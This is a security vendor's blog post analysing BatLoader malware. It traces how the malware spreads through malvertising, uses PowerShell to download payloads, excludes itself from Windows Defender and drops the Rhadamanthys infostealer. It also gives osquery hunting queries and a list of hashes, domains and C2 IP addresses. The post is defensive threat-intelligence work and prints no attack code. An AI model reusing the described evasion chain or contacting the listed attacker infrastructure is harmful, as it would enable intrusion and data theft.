Tracking BatLoader Malware Using Uptycs

Tags:
Blog Author
Uptycs Team

Contributed by: Nandakumar KJ & Josh Lemon

 

Stealthy, initial access malware known as BatLoader uses malvertising techniques. Due to how it embeds itself within a computer system, it’s challenging to fully remove it. Additionally, it makes use of legitimate tools for elevating privilege, decryption, and running malicious scripts to deploy second-stage infostealer malware, (e.g., Arkei/Vidar, Ursnif, Cobalt Strike Beacon, Rhadamanthys).

 

This blog post includes a technical analysis of the BatLoader malware along with a description of how Uptycs MDR analysts identify and remediate it. In many cases, we have provided the SQL queries used in our investigation.

 

Technical Analysis

BatLoader typically enters through malicious web pages that masquerade as trustworthy programs or software. Malvertising strategies and fake comments on forums having connections to BatLoader distribution locations can direct victims to these websites.

 

Uptycs recently observed where BatLoader initiated execution through an encoded PowerShell script. It used the WebClient.DownloadString method to retrieve the string from the URL to the local system.

BatLoader Malware: encoded PowerShell script using the WebClient DownloadString method used to retrieve the string from the URL to the Local system

 

Upon execution of the initial malicious PowerShell script, BatLoader executes additional PowerShell commands to add an exclusion to Windows Defender as part of a defense evasion technique.

BatLoader Malware: Upon execution of the initial malicious PowerShell script, BatLoaderBatloader executes additional PowerShell commands to add an exclusion to Windows Defender as part of a defense evasion technique.

 

The PowerShell script also downloads and executes additional executables; zkoko.exe.gpg, Nsudo.exe, and gpg4win-2.2.5.exe. These are placed in the $USERPROFILE$\AppData\Roaming directory.

 

BatLoader Malware: Domains accessed by PowerShell to collect second stage malware - screenshot from osquery, DNS to Process Mapping

Domains accessed by PowerShell to collect second stage malware – osquery, DNS to process mapping

 

select * from DNS_lookup_events Where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND pid =1548 AND upt_time between timestamp '2023-03-01 05:50:00' AND timestamp '2023-03-01 06:10:00'

 

BatLoader Malware: screenshot showing the downloaded *.exe / executable files

Downloaded executables – Uptycs Real-Time Actions



The payload is decrypted using the gpg4win.exe binary, a common Windows email and file encryption package. 

 

BatLoader Malware: screenshot of gpg2.exe process, decrypting using the gpg4win.exe binary

 

Nsudo.exe is a management tool to launch programs with elevated privileges. In this attack, it’s used to impair defense by hiding the window as the payload is being executed.

 

Nsudo.exe is a management tool to launch programs with elevated  privileges. In this attack, it was used to impair defense by hiding the Window as the payload was being executed.

 

The infostealer malware, dropped by BatLoader, attempts to collect sensitive data from victims' systems via the Windows API. This includes information about system disk drives, disk types, BIOS, processor, computer name, and serial number.

Additionally, the malware crawls directories of installed browsers on a victim's machine as it attempts to collect information stores for the following: browsing histories, bookmarks, cookies, autofills, and login passwords. Once sensitive data is collected, it’s then relayed to the threat actor’s server. In the malware sample we observed, the command-and-control (C2) server (79.137.204.54) is associated with the Rhadamanthys malware family.

 

BatLoader Malware: C2 Server Connection - screenshot of Contextual details in the Uptycs Detection UI
C2 server connection – contextual details in the Uptycs detection UI

 

Uptycs MDR

The Uptycs managed detection and response engine includes built-in behavioral rules, YARA signatures, and threat intelligence data. Our skilled security analyst team constantly monitors detections and hunts for widespread and active threats in the environment.

 

From this BatLoader malware sample, we observed our victim system also being infected with Rhadamanthys. Along with YARA signature detections in memory discovering it, detection included behavioral rules from known actions that malware performs along with Uptycs threat intelligence matches.

 

Additionally, Uptycs EDR contextual detection provides important details about identified malware, mapped behavior in the ATT&CK Matrix (left pane, below), and a detection graph that shows process ancestry. Users can navigate to the toolkit data section in the detection, then click on the name to learn more.

 

BatLoader Malware: Rhadamanthys Detection

Rhadamanthys detection

 

Built atop osquery, the Uptycs agent has the ability to collect vast, high-quality telemetry from endpoints, cloud resources, and Kubernetes systems. You can see the telemetry data in the available osquery tables (e.g., Process_events, PowerShell_events, scheduled_tasks). You can view the open-source schema here, to which Uptycs has added a significant number of additional tables.

 

Using Uptycs Investigate feature, we were able to further investigate malicious activity by running SQL queries against the osquery tables containing data collected from the endpoint where we executed the malware. 

 

BatLoader Malware: Screenshot from Uptycs UI showing “Searching process_events for finding activity of suspicious user”

Searching process_events for finding activity of suspicious user

 

select * from process_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND login_name = 'Administrator' AND upt_time between timestamp '2023-03-01 05:45:00' AND timestamp '2023-03-01 06:10:00'

 

BatLoader Malware: Screenshot from Uptycs UI showing “Searching socket_events for finding executables that connects to the C2 ServerSearching socket_events to find executables that connect to the C2 server

 

select * from socket_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND upt_day =20230301 AND remote_address ='79.137.204.54'

 

BatLoader Malware:  Screenshot from Uptycs UI showing “Searching api_events for finding the api calls used by zokoko.exe”

Searching api_events to find the api calls used by zokoko.exe

 

select * from api_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' and cmdline like '%powershell.exe  -command C:\Users\Administrator\AppData\Roaming\zkoko.exe%'

 

The Uptycs Managed Detection and Response (MDR) team responds to threats by using the Uptycs Protect remediation and blocking feature. It lets you kill, delete, pause, and scan the binary using YARA rules, or collect the file for additional analysis based on the detection graph for detected malicious activity (below). Additionally, we have the ability to manage users, run scripts on the host machine, quarantine the machine, or investigate the malicious process further.

 

BatLoader Malware: Uptycs Protect -Detection graph

Uptycs Protect – detection graph

 

Monitoring all potential threats in an environment is essential, especially those that abuse legitimate tools to obfuscate their presence like the BatLoader malware. The Uptycs MDR team makes this possible by detecting and taking action in response to threats in our customers environment.

 

Indicators of Compromise (IOCs)

 

   File name

Md5 hash

   zkoko.exe.gpg

199b1499566ddc2e86e3ea3e4db7f3ff

   Nsudo.exe

5cae01aea8ed390ce9bec17b6c1237e4

   gpg4win-2.2.5.exe

67a4f35cae2896e3922f6f4ab5966e2b

   zkoko.exe

3f82d9d43d56e56d523b2457bf6fa839

Domain/URL/IP Address

    job-lionserver.site

    job-lionserver.ru

    81.177.165.87

    185.199.111.133

    79.137.204.54

Malware Samples

https://www.virustotal.com/gui/file/19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

https://www.virustotal.com/gui/file/43894c287c3ebccd30cd761dd4826518073773180ae0ab28355d604b44071441